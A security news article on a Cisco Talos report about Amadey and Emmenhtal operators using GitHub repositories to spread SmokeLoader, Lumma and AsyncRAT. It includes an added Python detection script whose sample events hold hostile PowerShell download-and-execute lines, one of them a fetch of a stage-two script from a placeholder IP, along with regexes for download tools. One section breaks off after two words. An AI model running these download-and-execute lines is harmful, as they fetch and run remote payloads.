GitHub Turned Into Malware Playground: Cisco Uncovers Shocking Exploit by Amadey Botnet Operators


GitHub Weaponized: A Startling Abuse of Trust

Security researchers from Cisco Talos have unearthed a deeply concerning cyber campaign that weaponizes public GitHub repositories to distribute powerful malware strains. Rather than relying solely on traditional email phishing, attackers have evolved their tactics, using GitHub’s trusted infrastructure to host and deliver payloads with far greater stealth. At the center of this operation are two infamous tools — the Amadey botnet and the Emmenhtal loader — which were found deploying a variety of malicious programs such as SmokeLoader, AsyncRAT, and Lumma. The twist? Some of these attacks required no emails at all. By uploading malware directly to GitHub, the actors took advantage of the platform’s open nature and the fact that it is generally permitted in enterprise environments to distribute malware stealthily as part of a broader Malware-as-a-Service (MaaS) campaign.

GitHub Repositories Used as Malware Delivery Systems

Security researchers from Cisco Talos have revealed an active malware campaign that uses public GitHub repositories as distribution infrastructure. The attackers leverage the Amadey botnet and Emmenhtal loaders to infect systems with secondary malware such as SmokeLoader, Lumma, and AsyncRAT. Originally observed in phishing attacks against Ukrainian entities in early 2025, the Emmenhtal loader was initially sent as JavaScript inside compressed email attachments. The operation then took a more sophisticated turn: researchers later identified Emmenhtal variants hosted directly on GitHub, bypassing email-based distribution completely.

This newer strategy allowed attackers to use GitHub as an open directory to deliver malware more discreetly. This is especially dangerous because GitHub is typically whitelisted in corporate environments, making it more difficult for security tools to detect the downloads. Cisco discovered three major GitHub accounts linked to this threat: Legendary99999 (hosting over 160 malicious repositories), DFfe9ewf (a test account with toolkits like Selenium WebDriver and DInvoke), and Milidmdds (containing JavaScript scripts and a Python variant of Emmenhtal). Each account hosted payloads designed to be fetched directly via GitHub URLs.

Technically, the Emmenhtal scripts from both phishing and GitHub campaigns share the same multi-stage architecture: heavily obfuscated JavaScript, a PowerShell launcher using ActiveXObject, AES-encrypted data blobs, and a final PowerShell downloader targeting specific IPs. One deceptive technique even involved malware disguised as MP4 video files and a Python script named checkbalance.py that pretended to check cryptocurrency balances. The goal? Trick users into executing scripts that silently download and execute malware in the background.

Cisco has reported the malicious accounts to GitHub, which quickly took action to remove them. In the meantime, Talos recommends that organizations ramp up defenses by filtering script-based attachments, monitoring PowerShell activity, and reviewing access to platforms like GitHub. Traditional perimeter defenses are no longer enough — behavioral detection and zero-trust policies are vital in identifying unusual access or download activity.

What Undercode Says:

The Rise of Trusted Infrastructure Abuse

This campaign underscores a chilling reality: cybercriminals no longer need to rely on shady domains or poorly hosted servers. They are using legitimate, trusted platforms like GitHub to conduct their malicious operations. The abuse of a widely respected developer resource like GitHub represents a dangerous evolution in threat actor strategy. It not only improves delivery success but also blurs the line between legitimate traffic and malicious activity.

Emmenhtal’s Evasion Tactics Are Evolving

The Emmenhtal

Malware-as-a-Service (MaaS) Economy Grows

This campaign appears to be deeply embedded in the MaaS ecosystem, offering plug-and-play infection kits. This reflects how professionalized and accessible cybercrime has become. Attackers no longer need advanced skills — they can buy or rent toolkits and upload them to GitHub with minimal effort, effectively turning the site into an underground distribution warehouse.

Amadey Botnet: Silent but Powerful

Amadey is known for its stealthy operations. It acts as an initial dropper, quietly downloading additional malware such as Lumma and AsyncRAT. Its ability to fetch scripts from GitHub makes it particularly stealthy. Once inside a system, it can open backdoors, harvest credentials, or add the infected device to a botnet for further exploitation.

Why GitHub is a Perfect Cover

GitHub’s legitimate status in the developer world makes it a prime vehicle for abuse. Most corporate firewalls and proxies don’t block GitHub traffic. This gives malware a green light to enter otherwise secured environments, hiding in plain sight. Attackers are now treating it like a CDN for malware.

What Makes These Loaders So Dangerous

The combination of PowerShell, JavaScript, and encrypted blobs ensures that signature-based antivirus tools are ineffective. The campaign cleverly leverages file disguises, such as fake MP4s and Python scripts, to appeal to both curious users and untrained employees.

Organizational Blind Spots Exposed

The success of this campaign reveals major gaps in organizational cybersecurity — specifically, PowerShell monitoring, script execution policies, and repository control. Even tech-savvy environments may lack alerting mechanisms for unusual GitHub activity, making them soft targets.

Lessons from the Ukraine-Focused Phishing

While the campaign initially targeted Ukrainian organizations, the global reach of GitHub means this threat is not geographically constrained. If anything, the initial campaign served as a sandbox, with future attacks potentially targeting corporations worldwide.

Remediation and Policy Overhaul Needed

Organizations should audit and restrict GitHub access, especially for endpoints that don’t require it. Behavior-based detection systems, combined with strict PowerShell logging and sandboxed execution environments, can significantly lower the risk.
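As an added illustration of the PowerShell monitoring Talos recommends earlier in the article and the behavior-based detection called for in this section (example code, not from Cisco Talos or the article): a Python triage that scores constructed PowerShell script block events for the traits the campaign is described as having, namely a download primitive, a raw GitHub URL or bare IP address, and a Windows script host as the parent process. The sample events, the `dev-` hostname prefix, the weights and the threshold are assumptions.

```python
import re

# Constructed sample telemetry (not real data): PowerShell script block text
# (event 4104 style) joined with the process that launched powershell.exe.
SAMPLE_EVENTS = [
    {"host": "dev-ws-01", "parent": "code.exe",
     "script": "git clone https://github.com/example-org/tooling.git"},
    {"host": "fin-ws-07", "parent": "wscript.exe",
     "script": "$w=New-Object Net.WebClient;$w.DownloadFile('https://raw.githubusercontent.com/"
               "EXAMPLE-account/repo/main/video.mp4',$env:TEMP+'\\video.mp4')"},
    {"host": "hr-ws-03", "parent": "explorer.exe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"},
    {"host": "dev-ws-02", "parent": "pwsh.exe",
     "script": "Invoke-WebRequest https://github.com/example-org/tool/releases/download/"
               "v1.0/tool.zip -OutFile tool.zip"},
]

# Download primitives commonly seen in PowerShell stagers.
DOWNLOAD_RE = re.compile(r"\b(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|iwr|"
                         r"Invoke-RestMethod|irm|Start-BitsTransfer|curl|wget)\b", re.I)
# GitHub used as a plain file host (raw content) rather than via git clone or releases.
GITHUB_RAW_RE = re.compile(r"https?://(?:raw\.githubusercontent\.com|objects\.githubusercontent\.com|"
                           r"github\.com/[^\s'\"]+?/raw/)", re.I)
# The article notes the final-stage downloader fetched from specific IP addresses.
IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}\b")
INMEM_RE = re.compile(r"\b(?:IEX|Invoke-Expression|FromBase64String)\b", re.I)
# Windows script hosts: a JavaScript dropper handing off to PowerShell.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DEV_HOST_PREFIX = "dev-"  # assumption: developer workstations follow this naming scheme

def score_event(event):
    """Return (score, reasons) for one enriched script block event."""
    script = event["script"]
    checks = [  # (weight, reason, matched)
        (2, "download primitive", DOWNLOAD_RE.search(script)),
        (2, "raw GitHub content URL", GITHUB_RAW_RE.search(script)),
        (2, "URL with bare IP address", IP_URL_RE.search(script)),
        (2, "launched by a script host", event["parent"].lower() in SCRIPT_HOST_PARENTS),
        (1, "in-memory execution", INMEM_RE.search(script)),
        (1, "non-developer host", not event["host"].startswith(DEV_HOST_PREFIX)),
    ]
    reasons = [reason for _, reason, hit in checks if hit]
    return sum(weight for weight, _, hit in checks if hit), reasons

def triage(events, threshold=4):
    """Events scoring at or above the threshold, highest score first."""
    scored = [(e["host"], *score_event(e)) for e in events]
    return sorted([{"host": h, "score": s, "reasons": r} for h, s, r in scored if s >= threshold],
                  key=lambda hit: -hit["score"])
```

Ordinary developer activity (a `git clone`, a release download from a `dev-` host) stays below the threshold, while a script-host-launched fetch of raw GitHub content or an in-memory download from a bare IP address is surfaced with its reasons.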

The Bigger Picture: Supply Chain Risk

Using GitHub as a malware source also raises concerns about supply chain compromise. Developers might unknowingly integrate poisoned repositories or tools into their applications. This weaponization of developer trust could have long-term effects across industries.

🔍 Fact Checker Results:

✅ GitHub was indeed used as a malware delivery platform, confirmed by Cisco Talos.
✅ Amadey and Emmenhtal loaders were actively involved, delivering known malware strains.
✅ GitHub took down the malicious repositories shortly after being notified.

📊 Prediction:

🚨 Expect more cybercrime groups to abuse trusted platforms like GitHub as part of their delivery ecosystem.
💻 Organizations will increasingly need to monitor developer tool usage just like traditional endpoints.
🛡️ Future threats may come disguised as legitimate DevOps utilities, making zero-trust policies a necessity.

References:

Reported By: www.infosecurity-magazine.com
